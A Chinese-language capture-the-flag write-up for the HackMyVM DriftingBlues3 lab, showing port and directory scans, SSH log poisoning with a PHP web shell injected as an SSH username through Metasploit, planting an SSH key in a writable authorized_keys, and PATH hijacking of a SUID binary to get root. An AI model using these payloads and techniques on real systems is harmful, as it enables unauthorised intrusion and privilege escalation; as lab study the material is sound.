guayu-kakeru
0%

HMV-Driftingblues3

发表于 分类于

HMV-Driftingblues3靶场复盘

这个靶场有意思,学到了一个ssh注入

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.80.81     
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-19 23:04 CST
Nmap scan report for bogon (192.168.80.81)
Host is up (0.013s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
|   256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_  256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/eventadmins
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: C8:21:58:16:CF:C4 (Intel Corporate)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT      ADDRESS
1   12.87 ms bogon (192.168.80.81)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.02 seconds

还是只开放22端口和80端口

web探测


主页是这样的,没有一点有用的信息
进行目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
┌──(root㉿kakeru)-[~/tmp]
└─# dirsearch -u 192.168.80.81
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/tmp/reports/_192.168.80.81/_25-03-19_23-05-25.txt

Target: http://192.168.80.81/

[23:05:25] Starting: 
[23:05:26] 403 -  278B  - /.ht_wsr.txt                                      
[23:05:26] 403 -  278B  - /.htaccess.bak1                                   
[23:05:26] 403 -  278B  - /.htaccess.orig
[23:05:26] 403 -  278B  - /.htaccess.sample                                 
[23:05:26] 403 -  278B  - /.htaccess_orig                                   
[23:05:26] 403 -  278B  - /.htaccess.save
[23:05:26] 403 -  278B  - /.htaccess_extra
[23:05:26] 403 -  278B  - /.htaccess_sc
[23:05:26] 403 -  278B  - /.htaccessBAK
[23:05:26] 403 -  278B  - /.htaccessOLD2
[23:05:26] 403 -  278B  - /.htaccessOLD                                     
[23:05:26] 403 -  278B  - /.html                                            
[23:05:26] 403 -  278B  - /.htm
[23:05:26] 403 -  278B  - /.htpasswds                                       
[23:05:26] 403 -  278B  - /.httr-oauth
[23:05:26] 403 -  278B  - /.htpasswd_test
[23:05:27] 403 -  278B  - /.php                                             
[23:05:34] 301 -  315B  - /drupal  ->  http://192.168.80.81/drupal/         
[23:05:36] 200 -   11B  - /Makefile                                         
[23:05:36] 200 -   11B  - /MANIFEST.MF                                      
[23:05:38] 301 -  319B  - /phpmyadmin  ->  http://192.168.80.81/phpmyadmin/ 
[23:05:38] 200 -   28B  - /phpmyadmin/                                      
[23:05:39] 301 -  316B  - /privacy  ->  http://192.168.80.81/privacy/       
[23:05:39] 200 -   37B  - /robots.txt                                       
[23:05:39] 200 -   25B  - /secret/                                          
[23:05:39] 301 -  315B  - /secret  ->  http://192.168.80.81/secret/         
[23:05:39] 403 -  278B  - /server-status/                                   
[23:05:39] 403 -  278B  - /server-status                                    
[23:05:43] 200 -  458B  - /wp-admin/                                        
[23:05:43] 301 -  317B  - /wp-admin  ->  http://192.168.80.81/wp-admin/     
                                                                             
Task Completed

扫出来一些可以访问的目录,探测之后,发现之后robots.txt里面有有用的信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.80.81/robots.txt      
User-agent: *
Disallow: /eventadmins                                                                                                                                                        
┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.80.81/eventadmins
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://192.168.80.81/eventadmins/">here</a>.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.80.81 Port 80</address>
</body></html>

man there's a problem with ssh

john said "it's poisonous!!! stay away!!!"

idk if he's mentally challenged

please find and fix it

also check /littlequeenofspades.html

your buddy, buddyG

┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.80.81//littlequeenofspades.html
<!DOCTYPE html>
<html>
<body>
<p>Now, she is a little queen of spades, and the men will not let her be				</p>
<p>Mmmm, she is the little queen of spades, and the men will not let her be             </p>
<p>Everytime she makes a spread, hoo fair brown, cold chill just runs all over me       </p>
<p>I'm gon' get me a gamblin' woman, if the last thing that I do                        </p>
<p>Eee, gon' get me a gamblin' woman, if it's the last thing that I do                  </p>
<p>Well, a man don't need a woman, ooh fair brown, that he got to give all his money to </p>
<p>Everybody say she got a mojo, now she's been usin' that stuff                        </p>
<p>Mmmm, mmmm, 'verybody says she got a mojo, 'cause she been usin' that stuff          </p>
<p>But she got a way trimmin' down, hoo fair brown, and I mean it's most too tough      </p>
<p>Now, little girl, since I am the king, baby, and you is a queen                      </p>
<p>Ooo eee, since I am the king baby, and you is a queen                                </p>
<p>Le's us put our heads together, hoo fair brown, then we can make our money green     </p>
<p style="color:white">aW50cnVkZXI/IEwyRmtiV2x1YzJacGVHbDBMbkJvY0E9PQ==</p>
</html> 
1
2
3
4
5
6
┌──(root㉿kakeru)-[~/tmp]
└─# echo aW50cnVkZXI/IEwyRmtiV2x1YzJacGVHbDBMbkJvY0E9PQ== | base64 -d
intruder? L2FkbWluc2ZpeGl0LnBocA==                                                                                                                                                        
┌──(root㉿kakeru)-[~/tmp]
└─# echo L2FkbWluc2ZpeGl0LnBocA==  | base64 -d                       
/adminsfixit.php

这个adminsfixit.php文件里是ssh的日志文件
在这之前我还尝试了用出现过的用户名hydra爆破,但是这里的ssh不支持用密码登录。
这里卡住了我很久,我不知道怎么利用,先是以为可能有后门,用wfuzz扫了一下,然后每次都会出现一些新的字符,这里还有显示root有一个定时任务,但是也是没用。
看了wp知道要用的是ssh注入 因为这是php文件,就直接用php注入。但是要注意只能尝试一次。不然写错靶机就炸了

1
2
3
┌──(root㉿kakeru)-[~/tmp]
└─# ssh '<?php system($_GET["a"]); ?>'@192.168.80.81
remote username contains invalid characters

我直接这么写不行,所以用msf中的auxiliary/scanner/ssh/ssh_login这个模块也是新学到的 因为我们自己的ssh用这个用户名连不上,所以用换个登录方式

1
2
3
4
5
6
7
8
9
10
msf6 auxiliary(scanner/ssh/ssh_login) > set rhost 192.168.80.81
rhost => 192.168.80.81
msf6 auxiliary(scanner/ssh/ssh_login) > set rport 22
rport => 22
msf6 auxiliary(scanner/ssh/ssh_login) > set username <?php system($_GET['a']);?>
username => <?php system($_GET[a]);?>
msf6 auxiliary(scanner/ssh/ssh_login) > run
[*] 192.168.80.81:22 - Starting bruteforce
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

然后就可以反弹shell了

提权

有两个用户lost+found和robertj 第一个用户的文件夹无法进入
看robertj的文件夹发现.ssh文件可以写入

1
2
3
4
5
6
www-data@driftingblues:/home/robertj$ ls -al
total 16
drwxr-xr-x 3 robertj robertj 4096 Jan  7  2021 .
drwxr-xr-x 4 root    root    4096 Jan  4  2021 ..
drwx---rwx 2 robertj robertj 4096 Jan  4  2021 .ssh
-r-x------ 1 robertj robertj   33 Jan  7  2021 user.txt

那就把公钥写到authorized_keys里

1
2
3
www-data@driftingblues:/home/robertj/.ssh$ cat authorized_key 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCxliao26atOJyX3C9UgtIxt3RY9S4n921sYgmAxhw5sB58FESP8E+kWMC4QbT23azUa8zVr76QNhru+LVFTrW5R9SyxDDYQWjfRwDBiSe2X5MNiqoQU4tiW71DGYiO9M0xQNVx5Auvx6Ip6+kJqEpnXoU0Gw4zRxB3HjeEwYIly8HFATKaOP3Gh7rhwOXJ8gjcF7d6NcnsNbnOeUEArJjDhsax72TIiBYmza0PTg+8YZrjwvDqdZ+swMq5R9SPsn4sLyF5R82wjAajO4ce8qwcIanBxw5KeBfiChtilCaYb0JXH2bNlyQwedGjL2ARtnjgPhIKU/3N42trAcEXDwBCxkLRRGVkgrFDdYN70kcgfo2+7A7hBk2H7EFfY44bGcD9+YDsEqVS38VfxcDHNfM5V1ypS+ZirpY/RXK+46nHfAaieMuhNffS/zegzQEUTR1iHXWvDFOlwS7w3SNiBh4p69NyefputLJEdBhWUrIbsqvIOOzVNC03f7hd0Yq0gsZbvt7g10X4k18Wf7aI/3qg26Yw+LJ9zq1VBSKaon0fTYtxrDGyn3qGeT1dKUyFQzbKkKN19X6VYjlSWzFvEft7lgLixwZnsQabUR8XT0UIwfJbN7FU9j+hQos8PBWXsqZIX1q+by5prOChPXMP9phGofL8q+SrrKdPUZDMxV8Hbw== root@kakeru
www-data@driftingblues:/home/robertj/.ssh$ mv authorized_key authorized_keys 
1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kakeru)-[~/tmp]
└─# ssh robertj@192.168.80.81       
Linux driftingblues 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Mar 19 10:28:05 2025 from 192.168.80.12
robertj@driftingblues:~$

上传linpeas.sh 扫一下发现有一个文件有一个sgid

1
2
3
4
5
6
7
8
9
10
11
12
13
14
[+] SGID
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root mail       19K Dec  3  2017 /usr/bin/dotlockfile
-rwxr-sr-x 1 root tty        15K May  4  2018 /usr/bin/bsd-write
-rwxr-sr-x 1 root shadow     31K Jul 27  2018 /usr/bin/expiry
-rwxr-sr-x 1 root shadow     71K Jul 27  2018 /usr/bin/chage
-rwxr-sr-x 1 root tty        35K Jan 10  2019 /usr/bin/wall
-rwxr-sr-x 1 root shadow     39K Feb 14  2019 /usr/sbin/unix_chkpwd
-rwxr-sr-x 1 root crontab    43K Oct 11  2019 /usr/bin/crontab
-rwxr-sr-x 1 root ssh       315K Jan 31  2020 /usr/bin/ssh-agent
-r-sr-s--- 1 root operators  17K Jan  4  2021 /usr/bin/getinfo

robertj@driftingblues:/tmp$ id
uid=1000(robertj) gid=1000(robertj) groups=1000(robertj),1001(operators)

我们当前的用户就是operators这个组的,拿到本地去ida里面看看

1
2
3
4
5
6
7
8
9
10
11
int __cdecl main(int argc, const char **argv, const char **envp)
{
  setuid(0);
  puts("###################\nip address\n###################\n");
  system("ip a");
  puts("###################\nhosts\n###################\n");
  system("cat /etc/hosts");
  puts("###################\nos info\n###################\n");
  system("uname -a");
  return 0;
}

所以会执行三个命令 ip a cat /etc/hosts username -a 由于这个问价有sgid 所以我们用环境劫持的做法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
robertj@driftingblues:/tmp$ export PATH=$PWD:$PATH
robertj@driftingblues:/tmp$ which ip
/tmp/ip
robertj@driftingblues:/tmp$ /usr/bin/getinfo
###################
ip address
###################

###################
hosts
###################

127.0.0.1	localhost
127.0.1.1	driftingblues

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
###################
os info
###################

Linux driftingblues 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 GNU/Linux
robertj@driftingblues:/tmp$ bash -p
bash-5.0# id
uid=1000(robertj) gid=1000(robertj) euid=0(root) egid=0(root) groups=0(root),1000(robertj),1001(operators)

pwned!

总结

  • 学到ssh日志注入,其他的日志注入也是一个道理,这里用用户名作为注入点
  • php文件除了后门还要多想想能不能插入代码
  • 提权部分chmod +x /bin/bash bash -p 用了环境变量把执行的命令变成当前目录下面的命令